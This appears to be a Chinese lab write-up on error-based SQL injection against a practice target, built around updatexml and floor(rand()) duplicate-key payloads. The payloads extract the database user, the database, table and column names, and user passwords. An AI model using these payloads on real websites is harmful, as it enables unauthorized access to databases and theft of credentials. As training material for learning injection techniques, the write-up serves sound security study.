开启靶机
使用updatexml函数进行报错注入(前提是页面会回显数据库的报错信息),id参数用双引号闭合
爆出当前数据库用户:root@localhost
?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
?id=1" union select updatexml(1,concat(0x2A,(select user()),0x2A),1)--+
爆库名:security
?id=1" union select updatexml(1,concat(0x2A,(select database()),0x2A),1)--+
爆表名:emails,referers,uagents,users
select updatexml(1,concat(0x2A,(select group_concat(table_name)from information_schema.`TABLES` where table_schema='security' limit 0,1),0x2A),1) --+
爆用户名:Dumb,Angelina,Dummy,secure,stup
select updatexml(1,concat(0x7e,(select group_concat(username)from users limit 0,1),0x7e),1)
这里的用户名没有全部爆出来(updatexml的报错信息最多只显示32个字符,超出的部分会被截断),想全部爆出来,可以使用substr函数
爆密码(输出同样被截断):Dumb,I-kill-you,p@ssword,crappy
select updatexml(1,concat(0x7e,(select group_concat(password)from users),0x7e),1)
主键重复型
爆当前数据库用户:root@localhost
?id=1" and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
爆库名:security
?id=1" union all select 1,count(*),1 from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database()) --+
爆库名:ctftraining
?id=1" and (select 1 from (select count(*),concat(0x23,(database()),0x23,floor(rand(0)*2)) as x from information_schema.`columns` group by x) as y)--+
爆列名(users表):username
?id=1" and (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.`columns` group BY x) as y)--+